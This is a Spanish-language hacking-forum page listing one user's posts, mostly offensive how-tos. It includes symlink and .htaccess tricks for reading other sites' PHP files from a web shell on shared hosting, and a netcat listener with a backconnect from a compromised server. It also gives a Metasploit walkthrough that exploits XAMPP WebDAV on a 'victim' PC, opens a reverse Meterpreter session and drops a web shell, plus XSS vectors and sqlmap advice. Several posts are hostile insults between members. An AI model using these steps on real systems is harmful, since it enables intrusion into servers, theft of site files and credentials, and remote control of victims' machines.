Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CalebBucker

#1
Muy bueno!
#2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias por la explicación CalebBucker, pero sigo sin entender de qué manera obtenés información de las máquinas que se encuentran detrás del router...

Por ej., Si tengo la siguiente red local:
    - router --> 192.168.0.1
    - PC1    --> 192.168.0.101
    - PC2    --> 192.168.0.102

La IP pública del router es, por poner algo, 190.185.214.13.

Entonces hago un scan intenso con nmap:
Código: bash

nmap -sS -T4 -P0 -A -v 190.185.214.13


A partir de éste scan surgen datos de todo tipo del router, pero no entiendo porqué de las PCs que forman parte de su red local (PC1 y PC2).

Desde ya, muchas gracias!

WhiZ

Código: text
nmap -T4 -A -v 192.168.1.1/100
#3
Dudas y pedidos generales / Re:[AYUDA] Con Symlink
Marzo 02, 2013, 05:47:00 PM
Cita de: [Q3rV[0] link=topic=14980.msg52711#msg52711 date=1362254300]
El error se debe a que no puede identificar el fichero /etc/named.conf, proba de buscar los paths de las webs en /etc/passwd, en el fichero de configuracion de apache o a travez de algun FPD.

El symlink de manera manual lo realizas con el comando ln

Código: bash
ln -s /path/ /destino/fichero.txt


o con cat

Código: bash
cat path > destino/fichero.txt


Pero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo

Código: php

<? symlink("path", "destino"); ?>


Código: perl
#!/usr/bin/perl -w
symlink "path", "destino";


El fichero .txt no podra visualizarlo mientras no coloque algun .htaccess en la carpeta donde ha ejecutado el comando ln

---


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno, me he descargado el symlink 3.0 pero cuando lo pruebo usar sale read /etc/named.conf alguien sabe por qué? me han dicho que lo haga manualmente pero no se como..

En tu web shell ejecuta los siguientes comandos:

mkdir 123
ln -s / root

Luego subes un .htaccess para que puedas visualizar los archivos .php de las webs.
Código: text
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


Luego abres: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola a todos, tengo una duda.
Por ejemplo, cuando escaneo una direccion IP con Nmap, que es lo que estoy escaneando? El router? Si es asi, entonces digamos que hay un modem en un edificio y varias computadoras conectadas a una red local. Se supone que en internet todas esas computadoras tienen la misma direccion publica, entonces, cuando se realiza una conexion remota, como es que se conecta a una computadora especifica si todas tienen la misma ip, o en el caso de Nmap, como se cual de todas las computadoras de la red local estoy escaneando?
Se que se escucha algo tonto pero es algo que nunca entendi muy bien, y me gustaria saber como funciona. Gracias!

Hola,

Haber como te explico, seré breve en lo que diré, espero sepas interpretar.

Cuando escaneas una direccion IP con Nmap, simplemente estas escaneando la IP, pero como me supongo que sabras que detras de esa IP hay un Router y una PC, entonces por logica tu scan puede brindarte la informacion dependiendo de la opcion que has colocado en Nmap.

Por ejemplo podes usar un Intense Scan, esto te mostrara toda la informacion de la IP como tambien el S.O esta corriendo en dicha IP, nombre del sistema, mac, ip interna, puertos abiertos, firewall entre muchas cosas mas.

Si dentro de esa IP estan conectadas varias PC's (LOCAL) el Scan te enumerara cada pc con la informacion mencionada lineas arriba, entonces de ahi te podes guiar a que pc estas conectado o intentas conectarte ya que una pc puede ser Windows y otra Linux.

Una vez obtengas toda esta informacion, a partir de alli podes realizar tu Pentesting a una IP Interna especifica, porque simpre recuerda que el primer paso para realizar una Auditoria es la Information Gathering (Recopilacion de Informacion).

Espero te sirva.

Saludos.
#5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
CaleLammer, entiendo que pienses así y sigas afectado despues de todas las humillaciones que has recibido.

Respecto a lo demás, esta claro que la mac es unica.

Pero cuando estás scaneando una ip pública, estás scaneando la de ese ordenador y no la de todos.

Yo perfectamente puedo tener 2 ordenadores en mi casa, y en el router tener abierto un puerto como 6666, y en uno de los ordenadores tenerlo cerrado y en el otro abierto.

Y las ips públicas igual que las privadas, siempre son diferentes, siempre cambia algun digito final.
Nunca 2 ordenadores van a tener la misma dirección pública.

Pero bueno cada cual que piense sobre lo que quiera.  ;)

Humillaciones? Che para que me humilles a mi, tenes que volver a nacer!

Yo que tu dejo de responder porque en cada respuesta demuestras lo LAMMER que sos al no saber de este tema.

Y por tercera vez te digo que vayas a leer sobre REDES!!! oh algo de Pentesting para que tus ideas se ordenen.

Saludos matabolas.
#6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cuando estás scaneando una ip pública en concreto, estás scaneando esa computadora y los puertos que dispone.(Me explico, aunque el router los tenga abiertos, las 'compotuduras' obviamente estaran configuradas con algun firewall, para que ese puerto no se disponga abierto en ese ordenador en concreto.)

Una cosa diferente seria que scanearas un rango de ips, sobre esa ip.

Varias compotudras jamas pueden tener la misma ip pública, siempre cambia algun digito.

En realidad no es así. De hecho, todas las computadoras que se encuentren detrás de un mismo router tendrán la misma IP pública, por lo que desde internet no se puede saber cuántas ni cuáles PCs forman parte de esa red local (al menos que se tenga acceso al router, pero ese ya es otro tema).

Lo único que diferencia a las PCs entre sí es su IP privada y, por supuesto, su MAC.

Para que alguien pueda conectarse a una de ellas desde internet, lo que tiene que hacer es conectarse al router y, éste se encargará de enviar la información a la PC correspondiente. Es decir, la PC que se conecta desde internet nunca puede saber con qué PC de la red local se conectará. Sólo sabe que pertenece a ésa red local.

Con respecto a NMAP, es fácil. Si escaneas dentro de la red local, obtendrás datos de cada una de las PCs que la integran. Si escaneas una IP Pública, lo más probable es que escanees un modem/router (digo lo más probable porque se puede conectar una PC directamente a internet, sin router intermedio, pero no es común).

Espero haber sido claro.

Saludos!
WhiZ

Cuando se escannea alguna IP Publica y si dicha IP se encuentra bajo muchas PC'S conectadas, esta obtendra todos los datos de las PC's conectadas a esa IP, por que es muy simple, todas esas PC's tienen la misma IP Publica pero lo unico que los diferencia es en la IP Interna como por ejemplo una tiene 192.168.1.1 y otra 192.168.1.2 y asi sucesivamente.
#7
Hacking ShowOff / Re:XSS Double Encode CuantoCabron
Febrero 20, 2013, 07:35:19 PM
Por fin alguien usa Double Encode!
#8
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
felicidades ahora eres partidario del gobierno, defaceando páginas de clarin jajajaj

saludos!

XSS no es deface #LOL
#9
También tiene SQL pero en el dominio principal.

#10
Dudas y pedidos generales / Re:Safe mode on byppas
Enero 27, 2013, 12:32:32 AM
Usa esta shell:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tiene 3 opciones para desactivar el safe mode.
#11
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 10:41:55 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero vamos a ver, tu no endiendes la diferencia entre Scanner y Scanning ?

Che, dedicate a lo que mas sabes, RIPPEAR!!! y dejate de preguntar boludeces que hasta mi hija de 2 meses sabe lo que es SCANNER y SCANNING.

Y lee sobre Interger Overflow para que asi dejes de ayudar usando Wikipedia.

#12
Dudas y pedidos generales / Re:Integer Overflow
Enero 25, 2013, 06:35:39 PM
Algo tan fácil!, el Integer Overflow que te arroja el Vega, en si es como explotar el MS Access Injection, fijate la variable vulnerable y con el SqlMap lo explotas inmediatamente.

Acordate colocar los numeros siempre en 1.
#13
Hacking ShowOff / Re:XSS ElHacker.org
Enero 16, 2013, 03:46:55 PM
Dicha web tiene SQL, XSS y LFI.
#14
Igualmente, Feliz Navidad y Prospero Año Nuevo para todos!.
#15
Es muy simple! para todo existe una solución, por cosas pequeñas que no podes hacer en backtrack, no es la razón para que no la recomiendes. Acordate que no todos pensamos iguales.

Si los linuxeros leyeran lo que opinaste en el comentario anterior, que pensarian...

Saludos.

#16
Hacking ShowOff / XSS Found in FBI.GOV
Diciembre 28, 2012, 02:55:20 PM


Fue reportado en el mismo momento que encontré dicho bug, no me respondieron, a los 3 días verifique si el bug seguía vigente y para sorpresa estaba parcheado.

El vector fue esta:
Código: text
<body onLoad="while(true) alert('XSS');">


Saludos.
#17
En primer lugar antes de conectarte hacia algun servidor, tienes que verificar que tus puertos estén open.

Abres tu consola/terminal y ejecutas ifconfig para que compruebes que IP interna tenes, ejemplo:


Como vez, en este caso mi IP interna es 192.168.1.40 entonces por logica tengo que abrir los puertos desde mi router con esa IP, por lo que queria de la siguiente manera:


Ojo, tenes que habilitarlo en TCP y UDP para que no cree conflicto al momento que te vas a conectar.

Ahora, en tu terminal ejecuta el comando nc -lnvp PORT OPEN

Seguidamente si ya tenes todo eso habilitado, entras al servidor y ejecuta el backconnect indicando el PORT que has abierto, ejemplo:


Y por ultimo, si hiciste todo bien, recibiras la conexion perfectamente.


Mas fácil no puede ser.

PD: Yoya, si no recomiendas el BT es por que simplemente no sabes usarlo.
#18
Las pruebas las he realizado en un Sistema Operativo Windows 7 con el Firewall y Antivirus respectivamente activos y el resultado es exitoso.

Existen muchas formas de aprovecharse de alguna vulnerabilidad en una plataforma y/o software, pero siempre el usuario elige lo que mas le convenga.

Es cuestión de gustos, por ejemplo si estoy en Windows puedo usar el programa que mencionas, pero si estoy en linux puedo usar el MSF ya que como vuelvo a repetir con ambos se obtiene el mismo resultado.

Este Post no es con el fin de "obligar" al usuario que opte por realizar dicho método, simplemente se muestra otra manera de ataque en un sistema distinto.

Saludos.
#19
Cuando uno conoce sobre las vulnerabilidades y la forma de explotar manualmente, puede realizar el mismo ataque automatizado.

Y como dice el usuario Matabarras, esta se puede explotar usando el programa que menciona, como también con el Metasploit, tal cual se muestra en este post y con ambos se obtiene el mismo resultado, solo varian la forma en que el usuario pueda realizar sus pruebas.

Saludos.

#20

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

- BackTrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 - 8 (Victima)
- XAMPP (Victima)

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
Código: text
nmap -sS -T4 -A 192.168.1.38



Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
Código: php
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit


Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.


Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.


Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.

Espero les sirva y practiquen ;)